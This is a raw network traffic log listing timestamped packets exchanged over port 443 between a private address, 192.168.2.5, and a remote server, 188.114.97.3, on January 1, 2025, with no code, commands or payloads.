Jan 1, 2025 16:54:13.416899920 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.416948080 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.416956902 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.416982889 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.417001963 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.417427063 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.417448997 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.417499065 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.417506933 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.417541981 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.417828083 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.417843103 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.417912960 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.417922020 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.417970896 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.418085098 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.418100119 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.418138027 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.418143988 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.418169022 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.418178082 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.418270111 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.418283939 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.418324947 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.418332100 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.418370962 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.418504953 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.418519974 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.418555975 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.418561935 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.418581009 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.418695927 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.421981096 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.501789093 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.501806974 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.501895905 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.501904011 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.501945972 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.502166986 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.502183914 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.502218008 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.502224922 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.502249002 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.502268076 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.505599022 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.505614996 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.505655050 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.505661964 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.505688906 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.505698919 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.506072044 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.506087065 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.506118059 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.506124973 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.506149054 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.506169081 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.506524086 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.506539106 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.506570101 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.506575108 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.506598949 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.506608963 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.506609917 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.506622076 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.506639004 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.506656885 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.506692886 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.506697893 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.506735086 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.506736040 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.506746054 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.506759882 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.506783009 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.506789923 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.506814957 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.506823063 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.507023096 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.507038116 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.507067919 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.507075071 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.507100105 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.507106066 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.507934093 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.589109898 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.589129925 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.589220047 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.589236975 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.589268923 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.589278936 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.589284897 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.589302063 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.589318037 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.589353085 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.589358091 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.589397907 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.594289064 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.594311953 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.594372034 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.594377995 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.594413042 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.594702005 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.594718933 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.594757080 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.594763041 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.594788074 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.594804049 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.595130920 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.595146894 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.595182896 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.595189095 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.595215082 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.595230103 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.595246077 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.595263004 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.595294952 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.595300913 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.595324039 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.595340014 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.595870018 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.596484900 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.596504927 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.596544027 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.596549988 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.596582890 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.596590996 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.596674919 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.596692085 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.596724033 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.596729994 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.596755028 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.596770048 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.597888947 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.677615881 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.677638054 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.677740097 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.677747011 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.677792072 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.677803993 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.677819014 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.677859068 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.677866936 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.677903891 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.683037043 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.683053017 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.683125019 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.683131933 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.683163881 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.683172941 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.683254957 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.683269978 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.683300972 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.683307886 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.683329105 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.683348894 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.683612108 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.683634043 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.683662891 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.683670044 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.683696032 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.683712006 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.683824062 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.683840990 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.683880091 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.683886051 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.683909893 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.683916092 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.685091019 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.685107946 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.685161114 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.685167074 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.685198069 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.685215950 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.685293913 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.685308933 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.685348034 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.685353994 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.685379982 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.685401917 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.701550007 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.767258883 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.767283916 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.767333984 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.767344952 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.767355919 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.767383099 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.767394066 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.767400026 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.767412901 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.767443895 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.771656036 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.771671057 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.771722078 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.771744013 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.771759033 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.771781921 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.771805048 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.771825075 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.771851063 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.771858931 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.771882057 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.771899939 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.772335052 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.772349119 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.772389889 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.772398949 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.772432089 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.772449970 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.772464991 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.772491932 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.772500038 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.772524118 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.772540092 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.773622036 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.773637056 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.773678064 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.773689032 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.773722887 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.773916006 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.773931980 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.773963928 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.773971081 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.773993969 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.774008989 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.855804920 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.855822086 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.855909109 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.855931997 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.855978012 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.856311083 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.856326103 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.856414080 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.856421947 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.856456995 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.860439062 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.860455990 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.860502005 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.860510111 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.860539913 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.860553980 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.860810041 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.860826969 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.860863924 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.860871077 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.860897064 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.860915899 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.861211061 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.861227036 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.861275911 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.861282110 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.861315966 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.861318111 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.861327887 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.861357927 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.861366987 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.861375093 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.861409903 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.861428022 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.862374067 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.862390041 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.862437010 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.862443924 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.862483978 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.863683939 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.863701105 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.863739014 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.863745928 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.863774061 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.863786936 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.943783998 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.943806887 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.943871975 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.943885088 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.943923950 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.944878101 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.944894075 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.944957018 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.944964886 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.945003986 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.949387074 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.949403048 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.949475050 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.949481010 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.949518919 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.949583054 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.949603081 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.949634075 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.949640036 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.949666977 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.949680090 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.950202942 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.950222969 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.950258017 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.950263977 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.950293064 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.950305939 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.950558901 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.950576067 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.950608969 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.950614929 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.950642109 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.950655937 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.951679945 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.951697111 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.951741934 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.951749086 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.951775074 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.951786041 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.952202082 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.952215910 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.952250957 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.952258110 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:13.952281952 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:13.952291965 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.029320955 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.032360077 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.032381058 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.032453060 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.032459974 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.032505989 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.033194065 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.033210039 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.033246994 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.033252954 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.033265114 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.033291101 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.037616968 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.037636995 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.037695885 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.037703991 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.037744999 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.037928104 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.037942886 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.037990093 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.037997007 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.038031101 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.038475990 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.038492918 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.038527012 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.038532019 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.038558960 CET	49983	443	192.168.2.5	188.114.97.3
